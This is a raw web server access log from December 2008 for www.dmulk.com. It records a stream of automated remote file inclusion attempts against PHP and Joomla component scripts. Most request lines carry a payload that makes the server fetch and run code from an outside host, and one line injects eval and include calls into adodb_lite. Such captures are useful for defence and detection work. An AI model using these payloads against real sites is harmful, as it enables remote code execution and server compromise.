124.0.71.7 - - [08/Dec/2008:10:38:03 -0800] "GET /errors.php?error=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:10:38:03 -0800] "GET /logs/errors.php?error=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:38:06 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:38:07 -0800] "GET /phphtml.php?htmlclass_path=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:10:38:23 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:10:38:23 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:10:38:23 -0800] "GET /logs/access_080519.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
89.218.85.18 - - [08/Dec/2008:10:38:36 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [08/Dec/2008:10:38:36 -0800] "GET /logs/access_081016.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [08/Dec/2008:10:38:36 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
174.133.193.50 - - [08/Dec/2008:10:38:45 -0800] "GET /logs/access_080616.log//administrator/components/com_virtuemart/classes/htmlTools.class.php?mosConfig_absolute_path=http://www.buycheaperwebhosting.com/biex/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
89.218.85.18 - - [08/Dec/2008:10:41:03 -0800] "GET /logs/access_081022.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:10:41:15 -0800] "GET /logs/access_080401.log//skin/zero_vote/admin.php?dir=http://www.geocities.com/onthell/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:10:41:15 -0800] "GET /logs//skin/zero_vote/admin.php?dir=http://www.geocities.com/onthell/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:10:41:15 -0800] "GET /skin/zero_vote/admin.php?dir=http://www.geocities.com/onthell/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:10:41:23 -0800] "GET /skin/zero_vote/admin.php?dir=http://www.geocities.com/onthell/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:10:41:23 -0800] "GET /logs/access_080513.log//skin/zero_vote/admin.php?dir=http://www.geocities.com/onthell/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:10:41:23 -0800] "GET /logs//skin/zero_vote/admin.php?dir=http://www.geocities.com/onthell/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.90.225.108 - - [08/Dec/2008:10:41:46 -0800] "GET /logs///plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://thezbl.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
85.90.225.108 - - [08/Dec/2008:10:41:47 -0800] "GET //plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://thezbl.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:10:41:53 -0800] "GET /skin/zero_vote/admin.php?dir=http://www.geocities.com/onthell/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:10:41:53 -0800] "GET /logs//skin/zero_vote/admin.php?dir=http://www.geocities.com/onthell/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:10:41:56 -0800] "GET /logs/access_080401.log//skin/zero_vote/admin.php?dir=http://www.geocities.com/onthell/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.55 - - [08/Dec/2008:10:42:30 -0800] "GET /logs/access_080911.log//errors.php?error=http://www.300radiosports.com//sondage/image/idste.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.227.127.55 - - [08/Dec/2008:10:42:31 -0800] "GET /errors.php?error=http://www.300radiosports.com//sondage/image/idste.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.21.79.21 - - [08/Dec/2008:10:43:11 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.isacurvelo.com.br/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.21.79.21 - - [08/Dec/2008:10:43:11 -0800] "GET /logs/access_080618.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.isacurvelo.com.br/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:43:11 -0800] "GET /logs/access_080522.log//?mosConfig_absolute_path=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.21.79.21 - - [08/Dec/2008:10:43:11 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.isacurvelo.com.br/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:43:11 -0800] "GET /logs//?mosConfig_absolute_path=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 200 77030 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:43:16 -0800] "GET /?mosConfig_absolute_path=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 200 65555 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.156 - - [08/Dec/2008:10:43:17 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://h1.ripway.com/Insiderz85/iddu.txt%20%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.156 - - [08/Dec/2008:10:43:23 -0800] "GET /index.php?option=com_custompages&cpage=http://h1.ripway.com/Insiderz85/iddu.txt%20%0D?? HTTP/1.1" 200 94915 "-" "libwww-perl/5.805" "www.dmulk.com"
89.36.39.203 - - [08/Dec/2008:10:43:49 -0800] "GET /logs/access_081125.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.csctillay.fr/UserFiles/Image/newid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.36.39.203 - - [08/Dec/2008:10:43:49 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.csctillay.fr/UserFiles/Image/newid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.36.39.203 - - [08/Dec/2008:10:43:50 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.csctillay.fr/UserFiles/Image/newid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.90.225.108 - - [08/Dec/2008:10:44:22 -0800] "GET /logs///plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://thezbl.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
85.90.225.108 - - [08/Dec/2008:10:44:23 -0800] "GET //plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://thezbl.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
70.48.12.225 - - [08/Dec/2008:10:45:06 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://thezbl.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
70.48.12.225 - - [08/Dec/2008:10:45:06 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://thezbl.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
174.133.193.50 - - [08/Dec/2008:10:45:52 -0800] "GET /logs/access_080613.log//administrator/components/com_virtuemart/classes/htmlTools.class.php?mosConfig_absolute_path=http://www.buycheaperwebhosting.com/biex/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:10:46:12 -0800] "GET /parse/parser.php?WN_BASEDIR=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:10:46:13 -0800] "GET /logs/parse/parser.php?WN_BASEDIR=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:10:46:13 -0800] "GET /logs/access_081018.log/parse/parser.php?WN_BASEDIR=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:10:46:14 -0800] "GET /logs/access_080829.log/parse/parser.php?WN_BASEDIR=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:10:46:37 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:10:46:40 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.29 - - [08/Dec/2008:10:46:46 -0800] "GET /logs/access_080214.log HTTP/1.1" 200 1207211 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:10:47:01 -0800] "GET /logs/access_081018.log/parse/parser.php?WN_BASEDIR=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:10:47:02 -0800] "GET /parse/parser.php?WN_BASEDIR=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:10:47:02 -0800] "GET /logs/access_081018.log/parse/parser.php?WN_BASEDIR=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:10:47:02 -0800] "GET /logs/parse/parser.php?WN_BASEDIR=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:10:47:02 -0800] "GET /parse/parser.php?WN_BASEDIR=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:10:47:03 -0800] "GET /logs/parse/parser.php?WN_BASEDIR=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.38.105.213 - - [08/Dec/2008:10:47:17 -0800] "GET /logs/access_070814.log//content.php?seite=http://members.lycos.co.uk/sider000/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.38.105.213 - - [08/Dec/2008:10:47:17 -0800] "GET /content.php?seite=http://members.lycos.co.uk/sider000/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.38.105.213 - - [08/Dec/2008:10:47:18 -0800] "GET /logs//content.php?seite=http://members.lycos.co.uk/sider000/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.38.105.213 - - [08/Dec/2008:10:47:18 -0800] "GET /logs/access_071111.log//content.php?seite=http://members.lycos.co.uk/sider000/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:10:47:21 -0800] "GET /logs/access_080829.log/parse/parser.php?WN_BASEDIR=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:10:47:21 -0800] "GET /logs/access_080829.log/parse/parser.php?WN_BASEDIR=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
93.80.139.121 - - [08/Dec/2008:10:49:07 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/doni_they/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.80.139.121 - - [08/Dec/2008:10:49:13 -0800] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/doni_they/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.80.139.121 - - [08/Dec/2008:10:49:13 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/doni_they/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.80.139.121 - - [08/Dec/2008:10:49:42 -0800] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/doni_they/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.249.67.37 - - [08/Dec/2008:10:49:53 -0800] "GET /blog/index.php/page/2/?show=gallery&pageid=163 HTTP/1.1" 200 13413 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
89.163.192.68 - - [08/Dec/2008:10:50:17 -0800] "GET /logs/access_080503.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:10:50:17 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:10:50:17 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:10:51:00 -0800] "GET /logs/access_080322.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:10:51:01 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:10:51:01 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:10:51:14 -0800] "GET /logs/access_080311.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:10:51:17 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:10:51:42 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:10:52:26 -0800] "GET /logs/access_080925.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.67.37 - - [08/Dec/2008:10:52:33 -0800] "GET /blog/index.php/page/2/?show=gallery&pageid=172 HTTP/1.1" 200 13413 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.249.67.37 - - [08/Dec/2008:10:52:49 -0800] "GET /blog/index.php/2008/10/ HTTP/1.1" 200 12585 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
82.78.216.197 - - [08/Dec/2008:10:55:01 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ingenieria.unilibrecali.edu.co/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
82.78.216.197 - - [08/Dec/2008:10:55:01 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ingenieria.unilibrecali.edu.co/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
194.30.160.11 - - [08/Dec/2008:10:55:01 -0800] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://thebuckhornbar.com/webcalendar/includes/js/Insiderz/InsiderZ/Insiderz/crutz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [08/Dec/2008:10:55:01 -0800] "GET /logs/access_081115.log//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://thebuckhornbar.com/webcalendar/includes/js/Insiderz/InsiderZ/Insiderz/crutz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [08/Dec/2008:10:55:01 -0800] "GET /logs/access_081117.log//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://thebuckhornbar.com/webcalendar/includes/js/Insiderz/InsiderZ/Insiderz/crutz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [08/Dec/2008:10:55:01 -0800] "GET /logs//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://thebuckhornbar.com/webcalendar/includes/js/Insiderz/InsiderZ/Insiderz/crutz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [08/Dec/2008:10:55:13 -0800] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://thebuckhornbar.com/webcalendar/includes/js/Insiderz/InsiderZ/Insiderz/crutz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [08/Dec/2008:10:55:13 -0800] "GET /logs/access_081117.log//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://thebuckhornbar.com/webcalendar/includes/js/Insiderz/InsiderZ/Insiderz/crutz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [08/Dec/2008:10:55:13 -0800] "GET /logs//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://thebuckhornbar.com/webcalendar/includes/js/Insiderz/InsiderZ/Insiderz/crutz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [08/Dec/2008:10:55:13 -0800] "GET /logs/access_081115.log//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://thebuckhornbar.com/webcalendar/includes/js/Insiderz/InsiderZ/Insiderz/crutz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.159.73.78 - - [08/Dec/2008:10:55:29 -0800] "GET /logs//?path%5Bdocroot%5D=http://serv.roscan.net/idbut.txt??? HTTP/1.1" 200 77030 "-" "libwww-perl/5.805" "www.dmulk.com"
195.159.73.78 - - [08/Dec/2008:10:55:32 -0800] "GET /?path%5Bdocroot%5D=http://serv.roscan.net/idbut.txt??? HTTP/1.1" 200 94694 "-" "libwww-perl/5.805" "www.dmulk.com"
209.135.140.145 - - [08/Dec/2008:10:55:41 -0800] "GET /logs/access_081113.log/components/errors.php?error=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.135.140.145 - - [08/Dec/2008:10:55:42 -0800] "GET /components/errors.php?error=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.135.140.145 - - [08/Dec/2008:10:55:42 -0800] "GET /logs/components/errors.php?error=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:55:52 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:55:52 -0800] "GET /logs/access_080508.log%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:55:52 -0800] "GET /logs/access_080506.log%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:10:55:52 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:10:55:53 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.133.156 - - [08/Dec/2008:10:55:59 -0800] "GET /logs//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://h1.ripway.com/Insiderz85/iddu.txt%20%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.156 - - [08/Dec/2008:10:55:59 -0800] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://h1.ripway.com/Insiderz85/iddu.txt%20%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.156 - - [08/Dec/2008:10:56:02 -0800] "GET /logs/access_081117.log//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://h1.ripway.com/Insiderz85/iddu.txt%20%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.156 - - [08/Dec/2008:10:56:04 -0800] "GET /logs/access_081115.log//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://h1.ripway.com/Insiderz85/iddu.txt%20%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.228.158.38 - - [08/Dec/2008:10:56:06 -0800] "GET /logs/access_080919.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://geocities.com/kissunix/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.228.158.38 - - [08/Dec/2008:10:56:06 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://geocities.com/kissunix/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.228.158.38 - - [08/Dec/2008:10:56:06 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://geocities.com/kissunix/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
93.80.139.121 - - [08/Dec/2008:10:56:17 -0800] "GET /logs/access_080719.log%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/doni_they/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.228.158.38 - - [08/Dec/2008:10:56:41 -0800] "GET /logs/access_080919.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://geocities.com/kissunix/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.228.158.38 - - [08/Dec/2008:10:56:41 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://geocities.com/kissunix/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.228.158.38 - - [08/Dec/2008:10:56:42 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://geocities.com/kissunix/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:10:57:00 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
